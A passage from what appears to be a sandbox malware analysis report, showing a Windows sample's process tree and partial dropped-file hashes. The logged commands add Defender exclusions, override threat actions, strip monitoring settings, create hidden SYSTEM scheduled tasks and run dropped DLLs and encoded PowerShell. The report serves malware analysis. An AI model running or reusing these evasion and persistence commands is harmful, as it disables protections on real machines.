                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\gJkGBQIgGefEZMTgu" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2460
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zeoxHVLKMRnVtqWd" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2516
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zeoxHVLKMRnVtqWd" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2340
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BCLnCZtZU" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                    PID:3020
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BCLnCZtZU" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:776
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EonWkApmMnZKC" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                      PID:2736
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EonWkApmMnZKC" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2824
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FsbTokjwukMU2" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2804
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FsbTokjwukMU2" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2964
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kmBXJAkJjyTHqSsNouR" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:2852
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kmBXJAkJjyTHqSsNouR" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                          PID:2504
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lUHuQFRWyPUn" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                            PID:1876
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lUHuQFRWyPUn" /t REG_DWORD /d 0 /reg:64
                                                            4⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2788
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\xHjYKRHoNYMxhuVB" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:1564
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\xHjYKRHoNYMxhuVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2076
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2088
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1512
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\gJkGBQIgGefEZMTgu" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                                PID:2644
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\gJkGBQIgGefEZMTgu" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2296
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zeoxHVLKMRnVtqWd" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:380
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zeoxHVLKMRnVtqWd" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:2176
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /CREATE /TN "glZeOqMTn" /SC once /ST 02:21:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                  3⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:1820
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /run /I /tn "glZeOqMTn"
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1440
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /DELETE /F /TN "glZeOqMTn"
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:756
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2780
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                    4⤵
                                                                      PID:1080
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                    3⤵
                                                                      PID:2180
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                        4⤵
                                                                          PID:288
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /CREATE /TN "vBkjTgFkNhwlaWKHC" /SC once /ST 04:34:47 /RU "SYSTEM" /TR "\"C:\Windows\Temp\zeoxHVLKMRnVtqWd\tngMMowvgsXTbEt\lnucfcu.exe\" 0Z /ZPTudidZg 525403 /S" /V1 /F
                                                                        3⤵
                                                                        • Drops file in Windows directory
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:2312
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /run /I /tn "vBkjTgFkNhwlaWKHC"
                                                                        3⤵
                                                                          PID:2692
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 260
                                                                          3⤵
                                                                          • Loads dropped DLL
                                                                          • Program crash
                                                                          PID:864
                                                                      • C:\Windows\Temp\zeoxHVLKMRnVtqWd\tngMMowvgsXTbEt\lnucfcu.exe
                                                                        C:\Windows\Temp\zeoxHVLKMRnVtqWd\tngMMowvgsXTbEt\lnucfcu.exe 0Z /ZPTudidZg 525403 /S
                                                                        2⤵
                                                                        • Checks computer location settings
                                                                        • Executes dropped EXE
                                                                        • Drops Chrome extension
                                                                        • Drops file in System32 directory
                                                                        • Drops file in Program Files directory
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Modifies data under HKEY_USERS
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:1696
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                          3⤵
                                                                            PID:1032
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                              4⤵
                                                                              • Indirect Command Execution
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:2092
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                5⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:2276
                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                  6⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:1940
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                              4⤵
                                                                              • Indirect Command Execution
                                                                              PID:2532
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                5⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:696
                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                  6⤵
                                                                                    PID:532
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                4⤵
                                                                                • Indirect Command Execution
                                                                                PID:1836
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                  5⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2436
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                    6⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:1340
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                4⤵
                                                                                • Indirect Command Execution
                                                                                PID:1116
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                  5⤵
                                                                                    PID:2524
                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                      6⤵
                                                                                        PID:1632
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                    4⤵
                                                                                    • Indirect Command Execution
                                                                                    PID:860
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                      5⤵
                                                                                        PID:3004
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                          6⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Drops file in System32 directory
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1596
                                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                            7⤵
                                                                                              PID:2460
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /DELETE /F /TN "bfZLKvswclkylKDSwV"
                                                                                      3⤵
                                                                                        PID:2316
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                        3⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2736
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                          4⤵
                                                                                          • Indirect Command Execution
                                                                                          PID:2836
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                            5⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:2608
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                              6⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Drops file in System32 directory
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2804
                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                7⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:924
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                          4⤵
                                                                                          • Indirect Command Execution
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:2544
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                            5⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:2892
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                              6⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Drops file in System32 directory
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2444
                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                7⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1732
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BCLnCZtZU\cJjUnq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "WrKINDpEzknPfBj" /V1 /F
                                                                                        3⤵
                                                                                        • Drops file in Windows directory
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:2860
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /CREATE /TN "WrKINDpEzknPfBj2" /F /xml "C:\Program Files (x86)\BCLnCZtZU\RHXCASw.xml" /RU "SYSTEM"
                                                                                        3⤵
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:2524
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /END /TN "WrKINDpEzknPfBj"
                                                                                        3⤵
                                                                                          PID:1600
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /DELETE /F /TN "WrKINDpEzknPfBj"
                                                                                          3⤵
                                                                                            PID:1592
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "IIUMpfYOFZbTKI" /F /xml "C:\Program Files (x86)\FsbTokjwukMU2\NePjJkU.xml" /RU "SYSTEM"
                                                                                            3⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:2528
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "bAOFfydZVFVAf2" /F /xml "C:\ProgramData\xHjYKRHoNYMxhuVB\fSKpGUG.xml" /RU "SYSTEM"
                                                                                            3⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1540
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "cXtwXIeFrcXPcnYyD2" /F /xml "C:\Program Files (x86)\kmBXJAkJjyTHqSsNouR\CcfalvR.xml" /RU "SYSTEM"
                                                                                            3⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:2748
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "UqCtvZMDSRfiBWgVXfc2" /F /xml "C:\Program Files (x86)\EonWkApmMnZKC\QhjJoBu.xml" /RU "SYSTEM"
                                                                                            3⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:2824
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "bYMaCVExvtEzcQaxC" /SC once /ST 02:03:47 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\zeoxHVLKMRnVtqWd\ezGHSrJV\pOiexPI.dll\",#1 /IJTdideXsO 525403" /V1 /F
                                                                                            3⤵
                                                                                            • Drops file in Windows directory
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:2792
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /run /I /tn "bYMaCVExvtEzcQaxC"
                                                                                            3⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1876
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /DELETE /F /TN "vBkjTgFkNhwlaWKHC"
                                                                                            3⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1976
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 1560
                                                                                            3⤵
                                                                                            • Loads dropped DLL
                                                                                            • Program crash
                                                                                            PID:1628
                                                                                        • C:\Windows\system32\rundll32.EXE
                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\zeoxHVLKMRnVtqWd\ezGHSrJV\pOiexPI.dll",#1 /IJTdideXsO 525403
                                                                                          2⤵
                                                                                            PID:1776
                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\zeoxHVLKMRnVtqWd\ezGHSrJV\pOiexPI.dll",#1 /IJTdideXsO 525403
                                                                                              3⤵
                                                                                              • Blocklisted process makes network request
                                                                                              • Checks BIOS information in registry
                                                                                              • Loads dropped DLL
                                                                                              • Drops file in System32 directory
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Enumerates system info in registry
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:1564
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /DELETE /F /TN "bYMaCVExvtEzcQaxC"
                                                                                                4⤵
                                                                                                  PID:2888
                                                                                          • C:\Windows\system32\taskeng.exe
                                                                                            taskeng.exe {D05575CF-6271-4E4F-9797-A2ECAE2B475A} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]
                                                                                            1⤵
                                                                                              PID:1588
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                2⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Drops file in System32 directory
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2236
                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                  3⤵
                                                                                                    PID:328
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                  2⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Drops file in System32 directory
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2456
                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                    3⤵
                                                                                                      PID:2688
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                    2⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Drops file in System32 directory
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2628
                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                      3⤵
                                                                                                        PID:1624
                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                    1⤵
                                                                                                      PID:2532
                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                      1⤵
                                                                                                        PID:2944
                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                        1⤵
                                                                                                          PID:1216

                                                                                                        Network

                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\Program Files (x86)\BCLnCZtZU\RHXCASw.xml

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          8f6bbfd04cc85c2381b6a31416653866

                                                                                                          SHA1

                                                                                                          b87af4477af8d1fcffd2f2168b138907fbcc3c91

                                                                                                          SHA256

                                                                                                          a3870be3ab9bddd6b2a3a830b5492683f1d9a65a9076f3a783a8cd3e83523c2c

                                                                                                          SHA512

                                                                                                          a883863e36ffb795fe6915e8df20f5bf15bd8929ef4e97ea05e124f5f092ab2fb51df28355ee87a1c80d08ea2299201652fa5d0a793e734eda258bebbb8d47df

                                                                                                        • C:\Program Files (x86)\EonWkApmMnZKC\QhjJoBu.xml

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          8594cd5f130f42e7740360941f0fdc8d

                                                                                                          SHA1

                                                                                                          5f553eec6d080d488dd196c2b2c0cb96faf21dc2

                                                                                                          SHA256

                                                                                                          42436355bbe048f68849ba676b097ec99c05f05f8141fca38ce167c001b664f6

